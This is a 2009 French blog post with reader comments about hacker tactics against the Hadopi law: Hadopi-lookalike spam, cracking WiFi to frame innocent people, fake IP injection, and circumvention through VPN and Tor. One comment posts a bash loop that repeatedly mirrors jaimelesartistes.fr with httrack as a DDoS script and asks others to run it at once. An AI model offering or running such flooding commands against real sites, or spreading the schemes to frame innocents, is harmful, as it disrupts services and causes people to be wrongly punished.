Hackers et Pirates, il ne faut pas tout confondre. Un hacker est quelqu’un de doué avec l’informatique qui cherche à détourner l’usage d’une technologie pour en faire autre chose. Le but recherché n’est pas nécessairement illégal, il s’agit de maîtriser une technologie, d’en faire un usage ludique, étonnant, ou pourquoi pas artistique.
Dans ce petit clan, il y a – c’est caricatural – les bons (qui ne pensent qu’à s’amuser) et les méchants (qui pénètrent un système eCommerce pour récupérer des cordonnées bancaires), mais le propos de ce billet n’est pas là, et les frontières ne sont pas aussi manichéennes qu’on aimerai le faire croire.
Les Hackers sont contre Hadopi (à ma connaissance), mais leur lutte est plus… rigolote, créative… appelez cela comme vous voulez. Toujours est-il que notre position privilégiée chez RWW nous a permi d’avoir vent de plusieurs contres attaques en préparation qui risquent de faire de l’après Hadopi un joyeux bordel.
Evidemment, il n’est pas question de cautionner quoi que ce soit, mais d’observer et de rendre compte de cette guerre menée par un gouvernement contre la technologie, au moment même où de l’autre coté de l’Atlantique, on prend une direction diamétralement opposée. Aux Etats Unis, un hacker qui chercherait à nuire au gouvernement serait traîné dans la boue par ses pairs, en France, cela reste à voir. Hadopi risque fort d’être le Vietnam numérique du gouvernement.
Le spam
A l’origine du dernier email vous proposant un remède à une défaillance supposée de votre virilité (que vous soyez un homme ou une femme, peu importe), se trouve un hacker qui a trouvé non seulement un moyen de se constituer une base de données d’emails, mais également un moyen d’envoyer, souvent par l’intermédiaire d’ordinateurs infectés par un virus, une quantité énorme de spam.
On a à faire à des méchants hackers, soit, mais encore une fois, le problème n’est pas là.
Sur le modèle du spam, donc, plusieurs correspondants (anonymes, vous pensez bien), nous ont signalé des opérations à venir d’une remarquable similarité.
Leur intention ? Simple, envoyer à un maximum de petits Français une copie conforme de l’email officiel qu’Hadopi enverra aux téléchargeurs qui se seront fait repérés par les lobbys et dénoncés à Hadopi.
Ca marche avec le phising, pourquoi pas avec Hadopi.
Le but ? Simple aussi, noyer l’administration Hadopi sous les demandes d’internautes paniqués, ne comprenant pas pourquoi ils reçoivent cet email et demandant des explications à une administration qui devra bien mettre en place une procédure pour répondre. Outre que cela coûtera une fortune à Hadopi, les mails risquent au bout d’un moment à ne plus servir à grand chose, qu’ils viennent d’Hadopi ou d’un spammeur.
Le hacking de WiFi
Pour avoir assisté à un hacking de WiFi sur ma propre installation (sécurisée, enfin, en théorie), et avoir vu un gamin à peine majeur utiliser devant mes yeux ma connexion et mon imprimante réseau, je peux vous assurer que – pour peu que l’on soit doué avec un ordinateur – cela ne semble pas bien difficile à réaliser. Les manuels pour le faire sont faciles à trouver un peu partout sur le net, et il y a fort à parier que ce soit un grand classique au sein de la plupart des écoles d’ingénieurs.
L’opération ici consiste, avec un simple PC portable, à pénétrer sur des WiFi “sécurisés” et à télécharger des fichiers qui ont toutes les chances d’être surveillés par les majors (voir qui auront délibérément été mis en partage pour attirer leur attention, à partir de l’étranger bien sûr).
Moralité, dans les mois à venir, méfiez vous de toute personne à la terrasse d’un café en train de tapoter sur son PC, c’est potentiellement quelqu’un de dangereux.
Là encore, de multiples témoignages nous laissent croire que cette activité sera un grand classique pour quiconque ayant la capacité de le faire, en particulier pour incriminer et faire condamner des personnalités ayant défendu Hadopi et qui auraient le malheur d’utiliser le WiFi chez eux sans avoir pris la précaution de faire en sorte que leur lieu de résidence soit classé secret défense.
L’objectif est de multiplier le nombre d’innocents punis par la loi Hadopi afin de la montrer aux yeux du plus grand nombre comme quelque chose de potentiellement dangereux et parfaitement injuste.
Je vous donnerais bien la méthode conseillée par le gamin en question pour éviter de tels désagréments, mais ca mettrait en péril ma sécurité informatique. Sachez qu’elle est désarmante de bon sens et à la portée de n’importe qui.
L’injection d’IP
Là, c’est plus compliqué, mais ThePirateBay, le plus grand site tracker de bittorent au monde, a clairement annoncé qu’ils diffuseraient en tant que “partageurs” des IP aléatoires en grand nombre.
L’objectif est le même que pour le hacking de réseaux WiFi, multiplier les condamnations d’innocents et engorger le système. Cet objectif, pour ThePirateBay, est doublé d’une volonté de protéger ses utilisateurs en diluant dans la masse de fausses IP les IP de ceux qui téléchargent réellement.
Il y a fort à parier que la technologie mise au point apr ThePirateBay sera également utilisée par la plupart des autres serveur de ce type. Là encore, multiplication de condamnation d’innocents, service après vente d’Hadopi débordés, etc. etc.
Autre chose ?
Dans la lutte des hackers contre Hadopi, destinée à la rendre inefficace et à engorger le système, c’est tout ce qui est arrivé à nos oreilles… Et vous, vous avez entendu parler d’autre chose ?
![Reblog this post [with Zemanta]](http://img.zemanta.com/reblog_e.png?x-id=b448a592-001c-4a7c-bf4f-8b40e67acd5a)
A lire également :
- Votez pour (ou contre) la loi Hadopi Bien sûr, vous n’êtes pas député, bien sûr, vous ne pouvez pas voter, mais vous pouvez faire pression. La solution est simple, elle consiste à s’adapter aux outils technologiques de nos chers députés : l’email. UPDATE : Si votre député est à l’UMP ou si vous travaillez pour le...
- Jim Kerr des Simple Minds donne son avis sur Hadopi Alors que peu d’artistes Français se sont levés contre Hadopi, il semble désormais évident que les artistes étrangers sont d’un avis radicalement différent. Interviewé à chaud à la suite du vote de la loi Hadopi, Jim Kerr donne son avis sur la loi. ...
- Android vs. iPhone : chronique d’une bataille annoncée J’ai tendance a être partial quand il s’agit d’Apple, autan vous le signaler tout de suite, c’est plus qu’un disclaimer classique, cela peut toucher à la mauvaise foi, mon entourage vous le confirmera. Voilà pour le préambule. En marge du Facebook Garage de Paris, j’ai eu l’occasion d’avoir une fort...
- Les artistes peuvent-ils se permettent de lutter contre leurs fans ? C’est un jour qui fera date dans l’histoire de l’industrie musicale et de la musique en générale, et c’est probablement le premier artiste d’une longue série victime de l’Hadopi : après s’être fait l’égérie de la défense de la loi Hadopi Anglaise et avoir ouvert un blog pour exposer...
- Cali se désolidarise des artistes Français pro Hadopi Alors que les artistes Anglais ont formé une coalition pour dénoncer les majors dans leurs lutte contre les téléchargeurs et demandent à ce que les « pirates » ne soient pas inquiétés, le chanteur Cali, auteur, compositeur et interprète, dénonce le projet de loi et se désolidarise des artistes pro Hadopi....
- Un rapport souligne l’inefficacité des mesures de filtrages à venir sur internet Ipoque, le leader Européen dans la fourniture de matériel d’espionnage et de filtrage de contenus internet, à destination des institutions, entreprises et fournisseurs d’accès, vient de publier un rapport étonnant sur les différentes méthodes destinées à filtrer l’internet afin de lutter contre l’échange de fichiers protégés par le copyright....
- « Hadopi est une mauvaise réponse faite par des gens désemparés » Patrick Waelbroeck est professeur associé à l’ENST au département Economie et Science Sociale. Il y enseigne l’économie industrielle et l’économétrie. Il est détenteur d’un doctorat obtenu à la Sorbonne et fait une partie de ses études à Yale. Ses recherches actuelles portent sur une approche à la fois pratique, scientifique...
31 mars 2009 à 14:25
On peut ajouter à ça que les box sont maintenant pratiquement toutes équipées de UPnP, et il est fort à parier qu’on ne piratera jamais plus de sa propre connexion :p
Heureusement, les cryptages WPA sont beaucoup plus courants qu’auparavant, et ça en freinera… quelques uns. :)
31 mars 2009 à 14:29
Certes, mais avant que Mme Michu (ou Christine Albanelle) active et utilise l’UPnP…
La grande promesse des box, c’est le plug n’ play… un vrai problème pour le parc installé de plusieurs millions de box…
31 mars 2009 à 14:53
Un des problèmes non soulevé à l’AN est le fait que les box sont livrées par défaut wifi ON, et Mme Michu n’en sait rien.
Ce “problème” (notez les parenthèses) mériterai d’être soulevé dans l’hémicycle, j’aimerai savoir ce qu’Albanel ou le caniche albinos ont à répondre sur ce point.
31 mars 2009 à 15:17
Ben vous oubliez les attaques DDoS de sites de propagandes comme jaimelesartistes.fr non ?
31 mars 2009 à 15:26
une autre technique est de tout crypter et de passer par un vpn, les connexions seront anonymes, encapsulées dans un protocole standard donc on ne saura pas ce qui passe dans la connexion. cette solution est proposé par thepiratebay pour 5 euro par mois.
31 mars 2009 à 15:31
@EricD Ca c’est fait et franchement, ca ne gène pas grand monde, pas du tout l’administration Hadopi, et ca donne une très mauvaise images aux hackers… Franchement, pas très malin (mais bon, si je savais faire ça, j’aurais été tenté, j’avoue).
@Louis Nan, ca, c’est un moyen de contournement (on fera un billet, promis), pas un moyen de guerilla contre Hadopi ;)
Stay focus ;)))
31 mars 2009 à 16:06
Pénétrer chez un particulier via son Wifi, c’est d’une simplicité déconcertante, mais le plus effrayant, c’est que c’est extrêmement rapide à faire…
Quand Hadopi sera parmi nous, déconnectez vos Wifi…
31 mars 2009 à 16:17
Une attaque directe contre les serveurs de l’Hadopi (et ceux des porte flingues des ayants droits qui surveille les réseaux) est-elle envisageable ? Rien n’est sur à 100% nan ?
ok ca parait un peu gros, pas tres simple ni tres malin.
et pendant ce temps:
http://www.ecrans.fr/Massilia-Sound-System-le,6795.html
31 mars 2009 à 16:21
Pas bête, oui, ce n’est pas l’hadopi a proprement parler, mais une telle attaque a eu lieu contre bitdefender… qui était grosso modo le meme type de technologie.
voir aussi http://torrentfreak.com/mediadefender-one-year-after-the-email-leak-080915/
31 mars 2009 à 16:22
Je n’ai pas entendu parler d’autres choses que ce que tu cites, mais en revanche, je suis impressionnée par la motivation et le nombre de personnes prêtes à se consacrer à la ruine de l’Hadopi. A force de provoquer les gus dans leur garage, Christine Albanel les a chauffés à blanc.
31 mars 2009 à 16:36
Mouai, pour ce qui est de l’injection d’IP, je n’y crois pas du tout. En effet, il suffit à l’organisme de contrôle de se connecter avec un client Bittorrent, de commencer à télécharger une oeuvre illégalement, et de voir depuis quelles IP viennent les paquets.
Mais ça signifie que les gentils utilisent les même procédés que les méchants, ce qui n’est pas très très jolis (c’est comme si pour traquer les dealers, les policiers se mettaient à dealer aussi…).
Pour ce qui est de la protection des box, ce n’est pas un problème : une association avec les adresses MAC, et le problème est réglé. Sauf que ce genre de manipulation n’est pas accessible pour 0,1% des abonnés.
Enfin, en ce qui concerne le spam et le hacking de wifi, ces pratiques me font peur : en effet, je crains qu’elles risquent de se retourner (médiatiquement) contre leurs auteurs. Je vois déjà les députés pro-HADOPI crier au scandale si les opposants à HADOPI envoient des mails de phishing…
31 mars 2009 à 17:01
@AbriCoCotier : l’association par adresse mac fait perdre au mieux 5 ou 10 minutes au hacker motivé. il suffit de se faire passer pour l’adresse mac concernée, puis d’accéder au menu de la box, dont le mot de passe n’a pas été changé, et d’ajouter sa propre adresse mac. comme Mme michu ne sais même pas qu’il y a une interface d’admin sur sa box, elle ne s’en rendra jamais compte.
Il n’existe pas de protection absolue pour le Wifi. à part ne pas en avoir, évidement.
31 mars 2009 à 17:13
@Fabrice Merci pour cet article de très bonne qualité, une fois de plus.
Tu veux savoir comment faire une attaque DDOS ?
Tu peux toujours exécuter ce petit script avec un GNU/Linux:
#!/bin/bash
while $(test true)
do
httrack –continue http://www.jaimelesartistes.fr/ –O /tmp/ -%c300 –c300
00 done
Si tout le monde le fait en même temps, ca peut faire des dégâts…
Source : http://forum.ubuntu-fr.org/viewtopic.php?id=305030
31 mars 2009 à 17:19
@AbriCoCotier :
Tout à fait d’accord sur l’injection d’IP.
Par contre, les Livebox par exemple font déjà de la protection par adresse MAC, et ça ne protège rien du tout…
31 mars 2009 à 19:20
@abricocotier @Curieux
Pour les fake IP, j’avoue que je n’ai pas le niveau pour avoir un avis pertinent sur la question… Ceci dit, certains techos semblent plutôt convaincus…
http://www.generation-nt.com/pirate-bay-fausses-adresses-ip-fake-peer-hadopi-piratage-actualite-174671.html
Qu’est ce qui vous fait douter que cela puisse marcher ?
31 mars 2009 à 19:20
Le danger de l’injection d’IP est réel car les méthodes utilisées pour détecter les “pirates” téléchargeant une oeuvre ne se basent visiblement pas sur les paquets échangés, ce qui a été démontré par des universitaires américains qui ont fait inculper une imprimante réseau pour téléchargement illégal…
Alors à moins que les sociétés chargées de la récolte d’IP fautives mettent effectivement les fichiers protégés à disposition (ce dont je doute énormément car tous les “pirates” hors France pourraient se servir sans pouvoir être inquiétés), cette méthode sera plus qu’efficace pour embarasser la HADOPI !
31 mars 2009 à 19:26
@Pietro
Tu aurais un lien vers le travail de ces universitaires ? (on aime bien les travaux universitaires ici ;)
31 mars 2009 à 19:27
Bien sûr !
Article de écrans.fr sur le problème de la détection d’adresses IP :
http://www.ecrans.fr/Surveillance-du-p2p,4312.html
31 mars 2009 à 19:27
@Pietro
MediaDefender avait été grillé sur le fait de justement, mettre à disposition des fichiers, et pire, créer de toutes piece des trackers.
http://torrentfreak.com/mediadefender-one-year-after-the-email-leak-080915/
31 mars 2009 à 19:46
@Nikonoel
Vous je sais pas, mais moi je suis assez convaincu par la lettre du boss d’OVH. M’est avis que cela ne sert pas vraiment la cause des anti Hadopi de faire tomber ce site encore une fois…
http://www.numerama.com/magazine/12495-Jaimelesartistesfr-l-hebergeur-OVH-prend-lui-aussi-ses-distances.html
31 mars 2009 à 20:37
@Fabrice : Ce que je disais, c’est que l’organisme n’aurait qu’à commencer le téléchargement d’une œuvre via Torrent, puis regarderait quelle IP lui enverrait les paquets : les IP françaises seraient prises en “flagrant délis”… et les IP injectées ne seraient jamais actives.
31 mars 2009 à 20:44
Oui, mais là on basculerait sur un autre terrain, celui du juridique, et de l’incitation. Si les flics se mettaient à vendre de la drogue à la sortie des lycées, ce serait pas mal aussi ;) Il nous faudrait un avis juridique qualifié, mais à priori, ca change pas mal les choses…
31 mars 2009 à 21:14
Je ne pense pas que les “organismes” vont regarder qui télécharge effectivement des paquets d’oeuvres pour plusieurs raisons (il y en a sûrement beaucoup d’autres) :
- ils devront à leur tour mettre à disposition l’oeuvre (principe du P2P).
- Le nombre de sources de l’organisme sera très faible par rapport à tous ceux qui s’échangent le fichier sans passer par cet organisme. En plus, pour un fichier MP3 de quelques Mo, il n’y aura que peu de paquets échangés, et ils ne proviendront pas forcément de France.
Ils vont donc, par facilité et pour un bien meilleur “rendement” (ils seront bien payés pour ça après tout), se contenter de collecter les IP présentes sur les trackers, aisément falsifiables.
Enfin bon, si la HADOPI pense avoir une chance contre bien plus malin (et bien plus nombreux) qu’elle…
Je vois d’ailleurs déjà les “eBooks” les plus téléchargés des mois à venir :
- “Cracker le WiFi du voisin en 10 leçons”.
- “Falsifier une adresse IP pour les nuls”.
- “Le spam facile”
Et tout ça aux premières places des recherches “HADOPI” sur Google.
31 mars 2009 à 21:52
J’aillais répondre que le premier eBook n’est disponible qu’en Anglais, mais de toutes évidences, mes précédentes recherches datent un peu et il a été traduit depuis… Pour les deux autres… je vous laisse chercher ;)
01 avril 2009 à 9:41
oui enfin, pour l’instant cracker du Wifi en WPA/WPA2 qui a un vrai mot de passe (genre aléatoire et long d’une quinzaine caractères aussi divers que variés — majuscules/minuscules/chiffres/ponctuation) ca reste impossible dans la pratique.
Pas besoin d’etre parano et debrancher son WiFi.
01 avril 2009 à 10:08
Et pour le spam, vous oubliez tout simplement le cas le plus courant : se faire passer pour l’Hadopi, et demander soit des informations personnelles, soit au pire des cas, les données bancaires pour faire croire à un payement pour arrangement à l’amiable !
Non, il faut absolument que ça soit correctement organisé, que ça soit fait par des gens “qui savent” (mais j’en doute fort)… sinon, ça va être un véritable carnage !
01 avril 2009 à 11:41
J’ai installé l’extension WOT (Web Of Trust)sur mon Firefox.
Quand on tape “http://jaimelesartistes.fr”, WOT renvoie un feu rouge avec la mention “Attention — Ce site a mauvaise réputation”
C’est plus malin que de faire planter le site.
01 avril 2009 à 13:26
A ce jour, aucune attaque (hors attaque dictionnaire) n’a permis de se connecter à un réseau Wifi en WPA.
Seule une injection de paquets qui n’est pas une connexion exploitable a pu être réussie sur un WPA TKIP, et aucune en AES.
En conclusion, un accès WiFi protégé en WPA avec une clé non triviale est hors d’atteinte à ce jour.
01 avril 2009 à 13:49
Il existe deja des logiciel de p2p anonyme et resistant a la censure.
Le plus connu est Freenet http://fr.wikipedia.org/wiki/Freenet.
Sinon dans le genre on trouve aussi i2p, gnunet
02 avril 2009 à 14:11
“Aux Etats Unis, un hacker qui chercherait à nuire au gouvernement serait traîné dans la boue par ses pairs”
hein???
j’en suis franchement pas persuadé
@28 pishing non?
02 avril 2009 à 14:12
mm
macspoof?
une ligne de commande?
02 avril 2009 à 14:22
à 15m on choppe mes frappes clavier :s
alors oè c nouveau, m’enfin et dans 3ans?
03 avril 2009 à 15:35
—–
à 15m on choppe mes frappes clavier :s
alors oè c nouveau, m’enfin et dans 3ans?
—–
Oui, et on récupère ton image écran à + de 500m, hors de ton batiment, pour 100€ de materiel si ta carte graphique est à moins de 10m d’un tuyau de chauffage… et je ne plaisante pas.
—
Pour ce qui est du phishing, puisque ces messieurs confondent vol, contrefaçon et partage, jouons sur leur terrain, et demandons au gens de “rendre” au gouvernement le dernier MP3 téléchargé.
A 3 Mo le mail… :)
03 avril 2009 à 15:40
(désolé pour le doublon mais…)
A ce jour, aucune attaque (hors attaque dictionnaire) n’a permis de se connecter à un réseau Wifi en WPA.
Seule une injection de paquets qui n’est pas une connexion exploitable a pu être réussie sur un WPA TKIP, et aucune en AES.
En conclusion, un accès WiFi protégé en WPA avec une clé non triviale est hors d’atteinte à ce jour.
—–
Les WPA et WPA-2 sont craquables en moins de 15 minutes, le calcul passant sur le processeur d’une bonne carte graphique…
http://code.google.com/p/pyrit/
Désolé, mais aucun Wifi n’est sécurisable…
03 avril 2009 à 16:05
Vous êtes flippants les gars…
03 avril 2009 à 20:47
fiable ou pas ?
sinon je sais juste que certains sites peuvent bloquer un acces quand on est derriere certains proxy anonymous, (qu’en est il pour tor ?)
merci , grace à madame albanel j ai envie de m’instruire, enfin d ici janvier 2011 j ai encore tout le temps
03 avril 2009 à 22:24
Cher “j ai trouvé cela : TOR”, enfin, je vais t’appeler Kevin, parce que j’aime bien ce prénom ;)
Cher Kevin, donc, j’ai… comment te dire… une bonne, et une mauvaise nouvelle.
La bonne nouvelle, c’est que tu est sur le point de découvrir un monde passionnant, celui des geeks, pour qui passer par un VPN et se payer une Seedbox est une gène, mais pas un drame.
La mauvaise nouvelle, c’est que tu n’a pas réalisé que tu confonds une technologie destinée à passer les filtres, une espèce de réseau dans le réseau en terme de transfert de données… bref, un truc cool pour les geeks, TOR, avec un proxy à la con. Il y a encore du boulot, ça va te prendre du temps, mais tu le vois bien, si tu veux rester libre, t’as pas vraiment le choix. Va falloir bosser ;-)
Ha, non, c’est pas ça la mauvaise nouvelle, la mauvaise nouvelle, c’est que tu n’as pas vraiment autant de temps que tu le crois. Cette loi est passé par une procédure d’urgence, donc elle sera validée et mise en application fissa, de l’ordre de quelques semaines.
Les FAI ne sont pas prêts techniquement à mettre en application une éventuelle sanction de coupure. Certes. Ça va prendre du temps. Mais du coté de la détection des vilains téléchargeurs, tu crois vraiment qu’ils t’ont attendu Kevin ? ;-)
Allez… Tu les prends pour des cons ?
;-)
03 avril 2009 à 22:47
Boarf : la solution à mon avis reste de ne télécharger que des contenus non-français (ce qui n’est pas difficile vu les merdes produites actuellement), et quand tu reçois le premier mail (à quelle adresse ? quid de ceux qui se sont inscrit sans adresse mail ?) ou la première lettre en recommandé, tu arrêtes.
03 avril 2009 à 23:01
Heu… Louis… Comment dire… tu va pas me faire croire qu’avec la formation que tu as, la seule véritable question que tu te poses, c’est de faire un benchmarking sérieux des soluces de VPN et de Seedbox (j’suis preneur d’un benchmark d’ailleurs).
Soit honnête, ça va pas changer grand chose pour toi au final, juste des désagréments. Kevin, lui, il va se retrouver figurant dans 1984 d’ici quelques mois ;)
Toi, t’as les clés de ta prison /-)
03 avril 2009 à 23:14
Pfff et mon entourage qui me traite de geek, j’ai été largué dès le premier commentaire –___–
(bisous TimTam au passage, je vois qu’on à les mêmes RSS :) )
Bon y’a bien un “Bais** Hadopi pour les Nuls” qui va sortir, non ? ;)
03 avril 2009 à 23:17
@K-feine
En voilà une idée qu’elle est bonne !
Bon, évidement, faut pas s’attendre à voir ça en vente à la FNAC, mais faut écrire ce bouquin ;)
04 avril 2009 à 1:54
Et juste une question, et quid des Newsgroup ? Là ils ne peuvent pas faire grand chose de plus si c’est en connexion sécurisée …
04 avril 2009 à 2:05
Tu noteras que les FAI Français ne fournissent plus l’intégralité de Usenet (les newsgroups) depuis déja quelques temps. En clair, ce n’est pas Free, Orange ou 9télécom qui va te donner accès aux newsgroups pirate.
A partir de là, j’aurais tendance à dire que s’abonner à un fournisseur de newsgroups payant qui ne les filtrent pas, c’est faisable.
Maintenant, on va voir arriver avec LOPSI (Hadopi 2 : le retour) le filtrage du web français. Donc à priori, ces fournisseurs de Usenet vont être filtrés, tôt ou tard. Hadopi peut déjà filter d’ailleurs, ce n’est qu’une queston de temps, mais ça va être rapide, les solutions existent, loin d’être parfaites, mais ils s’en foutent, c’est pas comme s’ils n’avaient pas déjà tout l’internet à dos.
Tu me dira, tu n’as qu’à prendre un VPN pour y avoir accès, même pas besoin de cryptage. Mais là, à priori, tu va me dire que je parle Chinois.
En fait, la réalité, c’est que seuls les geeks ont les moyens d’être libres. C’est une situation bizarre. Il y a 5 ans, c’était des aliens, l’année dernière, ils commençaient à être à la mode, là, c’est une toute autre histoire qui commence.
04 avril 2009 à 9:02
C’est moche de dire ça, mais c’est vrai. Et je pense que c’était le but des législateurs : ne laisser libres que les pros.
Au final, ça va faire une grosse peur du net, ça va donner raison aux gens qui sont réticents à se “convertir” au web (d’où peut-être une chute de 30% de l’utilisation du net) : en gros, un gros coup de fusil dans le pied du net français. Comme si on avait besoin de ça. C’est là qu’on sent que cette loi n’est pas faite par des gens qui sont de la génération internet (dans distinction d’âge : Martine Billard, Brard et Bloche sont à mon avis de cette génération, ou tout du moins ils en ont compris les enjeux) : alors qu’il faudrait tout faire pour favoriser le net, on fait tout pour le restreindre. Youpi.
04 avril 2009 à 10:05
Dans les députés qui ont voté pour Hadopi ou qui ont laissé passé la loi sans rien faire, il conviendra de distinguer les salauds qui l’ont fait en toute conscience, les inculte qui n’y comprennent rien et qui ont suivit les instructions de leur parti (la non présence), et enfin les lâches qui n’ont pas eu les couilles d’être contre.
04 avril 2009 à 12:07
Une Riposte simple , accessible à tout le monde:
LE BOYCOTT
La liste des pro hadopi est facilement accessible,
Boycotté toutes les majors, plus d’achat de disque et de dvd.
Hadopi est le premier échelon d’un controle total de nos vie privée. Les abonnements internet/telephone/television
deviennent majoritaires chez les internautes, il n’y a plus qu’à controlé le tuyau.
BOYCOTTONS
TAPPONS LA ON CA FAIT MAL, LEUR FRIC.
04 avril 2009 à 15:11
@Fabrice
Au final je pense que c’est pas si évident qu’on est une fracture entre Geek / Pas geek dans l’accès à l’information libre. Comme tu le dis très bien les geeks ont réalisé d’une certaine mannière leur coming out. Ils sont écoutés et présents à peu près partout. Vous connaissez tous un ami geek qui peut vous dépanner votre ordinateur? Quand on lit RWW on est souvent cet ami :)
Et bien je pense que les moyens technologiques qui vont être développé pour contourner HADOPI seront bien pensé, user friendly et bien marketé. Ils seront diffusés comme Emule ou les torrents, via les geeks, au reste de la population.
La technologie et les moyens de contournement resteront invisibles pour la majorité des gens.
04 avril 2009 à 19:44
Ceux qui ont voté pour Hadopi sont clairement des pré-web. Ils n’ont rien construit grâce au net, et n’y ont aucun intérêt économique, culturel, éducatif, professionnel, social.
Au contraire, la société numérique menace leurs positions gagnées sur des bases anciennes.
Donc quand AbriCoCoTier dit “C’est là qu’on sent que cette loi n’est pas faite par des gens qui sont de la génération internet”
C’est probablement très vrai, à un point tel qu’il y a maintenant une divergence d’intérêt plus grande que jamais entre “eux” (les pré-web) et “nous” (les connectés, à qui le net apporte bénéfices culturels, sociaux, professionnels et économiques).
Pour les pré-web, être coupé du net ne change rien.
Pour quelqu’un de la classe des connectés, c’est une attaque contre sa vie culturelle et sociale même. C’est du même ordre que lui confisquer ses biens physiques.
Les libertés numériques vont devenir l’équivalent du droit de propriété pour la bourgeoise émergente au 18ème: des droits réels et utilisés, mais à faire écrire dans la loi pour les légitimer et les protéger.
Par contre, pour ce qui est des pré-web sympathisants, comme Bloche ou Billard, je ne suis pas complètement certain que “tout du moins ils en ont compris les enjeux”.
Le peu que j’ai vu des réponses des anti-hadopi pré-web m’a donné l’impression d’argument ad-hoc sans profondeurs.
Mais ils sont probablement enthousiastes sur les nouveaux usages, et surtout réalistes sur la capacité à faire revenir en arrière la société !!
04 avril 2009 à 22:18
Et bien je pense que les moyens technologiques qui vont être développé pour contourner HADOPI seront bien pensé, user friendly et bien marketé.
Jetez un oeil à la Fonera 2.0 ;)
05 avril 2009 à 11:47
“Moralité, dans les mois à venir, méfiez vous de toute personne à la terrasse d’un café en train de tapoter sur son PC, c’est potentiellement quelqu’un de dangereux.”
Non mais dites pas ça, y en a qui vont vraiment le prendre au sérieux. On est déjà trop entourés de paranos sociaux, ils vont tout confondre! Hacker/pirate/geek…
Dans l’inconscient collectif du péquin moyen, ça veut dire la même chose… Enfin quand je dis “inconscient collectif du péquin moyen” j’entends aussi, et surtout malheureusement, la presse “classique”. Et c’est clairement lamentable.
05 avril 2009 à 14:18
>Une Riposte simple , accessible à tout le monde:
LE BOYCOTT
Ecrit par : fripon | 4 avril 2009 à 12:07
Fait en ce qui me concerne !
Je n’ai rien acheté à la FNAC depuis novembre 2005, ni DVD, ni CD, ni bouquins, rien : boycott total. Je me rends à la FNAC pour consulter les prix, et c’est tout.
J’ai acheté mes clés USB (et mon disque dur externe) à l’étranger, afin de ne pas payer la “taxe sur la copie privée”.
Je ne vais jamais au cinéma voir des films où jouent des acteurs pro Hadopi ( ce qui élimine la plupart des films français !!! Mais je m’en passe fort bien !)
05 avril 2009 à 16:06
@Lokeu
T’inquiète pas, Mme Michu ne lit pas RWW ;)
05 avril 2009 à 23:27
1/ Primo : Restez dans la légalité
2/ Secondo : Oui boycottez , mais je crois que les 1er à Boycotter , c’est les députés , ministres et en général , les policiciens Français .…
Comme l’indiquait Simple mind, “les Français aime bien Couper” et que suis non violent , j’ai pensé qu’il fallait isoler ces personnes des réseaux sociaux …
Bref, déja à la TV , ces personnages n’énervent particulièrement à nous donner des leçons, et même sur ce blog voir madame la Ministre de l’internet inviter les blogeurs Français à Fayotter dans ses locaux (et se taire à propos de cette loi) … (Ok , Ok, pas toi Fabrice, vu tes activités dangeureuses durant cette période, désolé de mes remarques) …
J’ai crée le groupe : “Hadopi Citoyen: Virer Ministres Députés Politiciens Français de Facebook” sur Facebook …
http://is.gd/qU3a
En 2 mot , mon chat quand je lui joue des sales tours, me fait la gueule pendant un certain temps …
Je fais pareil avec nos ministres, Députés et Politiciens Français !!!
Si cela vous interresse , vous savez ou trouver ce groupe Facebook … http://is.gd/qU3a
06 avril 2009 à 1:50
Pour ma part je n’achete deja aucune “musique” française parce que je ne supporte pas ça, et donc a fortiori je n’en télécharge pas non plus, même gratuite, la merde reste de la merde!
J’achete peu de cd en France parce que certains ne sont tout simplement pas ou plus édités chez nous, car il faut faut bien faire de la place à tous cs grands “artistes” qui font l’exception culturelle française que le monde entier nous envie (tellement que les radios du monde entier se les arrachent!)
Ensuite aucun dvd français à cause des sous titres français trop souvent imposés sur les vo et je ne regarde qu’en vo, ou des versions coupées des films et autre joyeusetés: mes dvd viennent de Grande-Bretagne ou d’amérique du nord.
Aucun média vierge en France, puisque ne téléchargeant aucuns films/musique français, je ne vois pas pourquoi je devrais payer une taxe soit disant compensatoire qui ne me concerne pas.
Si cette loi est appliquée, je reviendrai plus de 10 en arriere, avec un abonnnement France telecom pour ma ligne fixe et des voyages au cybercafé pour chercher quelques trucs et consulter mes mails. Ca aura surement son charme!
En attendant tous ces gens (FNAC, majors, sacem, pseudo “artistes” français)qui ne reçoivent deja pas le moindre sou de ma part n’en auront pas davantage. Et d’ailleurs, je ne veux pas soutenir la création musicale française, bien au contraire!
Qu’elle disparaisse, cela m’évitera d’avoir à changer de station de radio toutes les 5 minutes pour m’épargner le supplice de la diarrhée sonore dont nous gratifient nos si chers “artistes” d’exception française.
06 avril 2009 à 3:02
Vous n’avez pas compris Hadopi ?
Même sans télécharcher , même si vous n’écoutez pas de musique , votre IP risque d’être repéré … Soit parce que vous n’avez pas coupé votre wifi (et que votre voisin l’utilise) , soit que les routeurs ont mal stockés vos ip , soit d’autre raison techniques qui me dépassent, et aucun moyen de prouver votre bonne fois .
07 avril 2009 à 22:21
contre hadopi,
Nous devrons les attaquer où ça fait mal!! a réfléchir
Rendons tous notre connexion internet à nos FAI.
Nous verrons bien l’état français réagira.
je suis pour la licence globale et vive la licence globale et vive la liberté.
08 avril 2009 à 17:49
Le wifi c’est le truc le moins sécurisé qui existe en informatique et ca me fait bien rire,.… même une clé WPA se brise avec les bons outils. pour ma par il est carement désactivé :)
En plus avec cette loi “debile” les personnes qui voudront telecharger sans risque utiliseront des bornes wifi non protéger, j’en suis certains.…
si vous voulez continuer de telecharger il vous faudra cryptez les flux, qui rentrent ou sortent de chez vous. Il existe sinon depuis plusieurs années déjà des réseaux dans internet qui sont + ou — cacher, comme “TOR”. les réseaux onion. en quelques mots, vous installer un soft qui vous permet d’utilisé 5 points (5 PC avec TOR) ou plus. Vous passer par ces point de connection pour sortir et entrer sur le net, le flux passe donc par c’est autres PC en crypté bien sur.…
voir ici — http://www.torproject.org/index.html.fr —
De toute façon cette guerre ne finira probablement car le gouvernement est toujours à l’àge de pierre dans le domaine et c’est pas prés de changer. Les personnes qui contrôle ce milieu feront tout pour conservé le pouvoir
Les attaques DDoS ont déjà fait peur en Estonie.… je pense que cela continura par la suite.
http://www.pcinpact.com/actu/news/41434-attaque-DoS-estonie-pirate-condamnation.htm
la BBC qui test des attaques
http://www.pcinpact.com/actu/news/49773-bbc-bornet-attaques-ddos-zombies.htm
Ne vous faites pas prendre comme des bleus LOL„, renseigné vous il existe plein de solutions legals ;)
es que vous étes infecté par un virus, ben ya des chances vue la carte f secure LOL
http://worldmap.f-secure.com/vwweb_1_2/vwm/map/clen/de200909800/ds200909700/dt3/gceu/ic10/if0/ii0/is2/ly100/ro0/rtpage/zz.html
08 avril 2009 à 23:02
